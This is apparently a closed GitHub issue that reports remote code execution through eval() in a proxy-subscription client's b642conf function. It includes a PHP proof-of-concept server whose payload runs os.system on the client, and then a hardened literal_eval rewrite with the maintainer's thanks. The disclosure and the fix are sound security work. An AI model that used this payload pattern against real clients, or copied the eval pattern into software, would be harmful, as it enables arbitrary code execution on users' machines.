Closed TomAPU closed 4 years ago
The vulnerability is in the function b642conf in sub2conf_api.py (line 45). In this function, to convert a string to a dict, the author used the function eval to do so.

```python
import base64
from urllib import parse

def b642conf(self, prot, tp, b64str):
    if prot == "vmess":
        # eval() executes whatever Python expression the decoded string contains,
        # so the subscription server fully controls what runs here
        ret = eval(parse.unquote(base64.b64decode(b64str).decode()))
        region = ret['ps']
```

However, this function is UNSAFE: anyone who controls the b64str string can execute any Python code he/she wants on your machine. When the user clicks the button 更新订阅 (update subscription), the client sends an HTTP request to the subscription server for subscription data. A malicious subscription server can send a crafted HTTP response to the client to execute arbitrary Python code on the client's machine! Anyone who controls the data, from the server owner, to a MITM attacker, to hackers who control the server, can execute any code on the client's machine.
POC CODE
```php
<?php
// Move this file to /var/www/html/index.php and start your Apache service.
// Set the subscription server to http://127.0.0.1/ and click the button.
$shellcode = "__import__('os').system('gedit')";
$payload = "vmess://";
$payload .= base64_encode($shellcode);
$payload .= "\n";
$payload = base64_encode($payload);
echo $payload;
?>
```

POC EXPLOITED RESULT:

FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing (convert a string to a dict) safely.
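A hardened version of the decoding path, added here as an example (it is not code from the project or from the reporter). It replaces eval with ast.literal_eval as the fix suggestion proposes, then checks that the result really is a config dict before trusting it. The function names b642conf_safe, is_safe_entry, parse_subscription and the encode_* helpers are assumptions for this example, and the subscription contents built in the demo are constructed, not real servers.

```python
import ast
import base64
from urllib import parse


def b642conf_safe(b64str):
    """Decode one vmess payload (base64 of a percent-encoded Python dict literal)
    into a dict without ever evaluating code. Raises ValueError on anything else."""
    decoded = parse.unquote(base64.b64decode(b64str).decode())
    try:
        # literal_eval only accepts literals (strings, numbers, dicts, lists, ...);
        # a call such as __import__('os').system(...) raises ValueError instead of running
        conf = ast.literal_eval(decoded)
    except (ValueError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError("subscription entry is not a literal dict") from exc
    # Shape check: the caller reads conf['ps'], so require a dict that has it
    if not isinstance(conf, dict) or not isinstance(conf.get("ps"), str):
        raise ValueError("subscription entry is not a vmess config dict")
    return conf


def is_safe_entry(b64str):
    """True if the entry decodes to an acceptable config, False if it is rejected."""
    try:
        b642conf_safe(b64str)
        return True
    except ValueError:
        return False


def parse_subscription(sub_b64):
    """Outer layer: the subscription body is base64 of one 'scheme://payload' line
    per server. Only vmess entries are handled; rejected entries are skipped."""
    confs = []
    for line in base64.b64decode(sub_b64).decode().splitlines():
        if not line.strip():
            continue
        scheme, _, payload = line.partition("://")
        if scheme != "vmess":
            continue
        if is_safe_entry(payload):
            confs.append(b642conf_safe(payload))
    return confs


def encode_entry(text):
    """Constructed helper: inverse of the decoding steps, used to build sample entries."""
    return base64.b64encode(parse.quote(text).encode()).decode()


def encode_subscription(entries):
    """Constructed helper: wraps 'scheme://payload' lines the way a server would."""
    return base64.b64encode("\n".join(entries).encode()).decode()


if __name__ == "__main__":
    # Constructed sample data: one benign server config and one non-literal entry
    good = encode_entry("{'ps': 'tokyo-01', 'add': 'example.invalid', 'port': 443}")
    bad = encode_entry("__import__('os').getcwd()")
    print(b642conf_safe(good)["ps"])          # tokyo-01
    print(is_safe_entry(bad))                  # False (rejected, nothing executed)
    sub = encode_subscription(["vmess://" + good, "vmess://" + bad, "ss://ignored"])
    print(len(parse_subscription(sub)))        # 1
```

The shape check matters as much as the swap to literal_eval: a payload that decodes to a list or a bare string is still a literal, and the original code's ret['ps'] would raise an unhandled exception on it, so the function refuses anything that is not a dict carrying a 'ps' string.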
Thank you for your issue; the next update will solve this problem. Thank you.